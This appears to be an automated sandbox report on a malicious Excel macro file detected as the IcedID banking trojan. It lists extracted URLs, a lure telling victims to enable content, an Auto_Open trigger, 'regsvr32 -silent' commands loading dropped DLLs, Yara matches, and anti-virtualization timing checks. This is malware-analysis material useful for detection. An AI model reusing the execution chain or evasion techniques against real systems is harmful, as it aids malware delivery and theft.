        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://awsmedia.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://b0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://c0.b0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://calculator.aws
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://chtbl.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic-china.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d1fgizr415o1r6.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d2908q01vomqb2.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d3borx6sfvnesb.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dftu77xade0tc.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dpm.demdex.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://f0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://img.youtube.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://marketingplatform.google.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://p.adsymptotic.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1MEGKE28WTTVJKEVVHZSJX-Content-Ty
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://prod.log.shortbread.aws.dev
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://prod.tools.shortbread.aws.dev
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-messaging-pricing-information/
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/public-pricing-agc/
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://spot-bid-advisor.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://ssl-static.libsyn.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://static-cdn.jtvnw.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://static.doubleclick.net
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://view-stage.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://website.spot.ec2.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://www.buzzsprout.com;
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://www.linkedin.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube-nocookie.com;
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://yt3.ggpht.com;
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
        Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

        E-Banking Fraud:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2908, type: MEMORY

        System Summary:

        barindex
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
        Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
        Office process drops PE fileShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_003C1678 NtQuerySystemInformation,RtlAllocateHeap,4_2_003C1678
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_003C18104_2_003C1810
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8FB15D04_2_000007FEF8FB15D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8FB41BF4_2_000007FEF8FB41BF
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
        Source: 4.2.regsvr32.exe.3c0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000004.00000002.2088452556.0000000000190000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/4@7/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Vac.list07-20214862208.xlsmJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC5FD.tmpJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Vac.list07-20214862208.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
        Source: Vac.list07-20214862208.xlsmInitial sample: OLE zip file path = xl/media/image1.png
        Source: Vac.list07-20214862208.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: Vac.list07-20214862208.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: lsdfik[1].fml.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_003C1E50 4_2_003C1E50
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000003C1E71 second address: 00000000003C1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000003C1EAB second address: 00000000003C1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_003C2434 rdtsc 4_2_003C2434
        Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_003C27BC
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpBinary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpBinary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
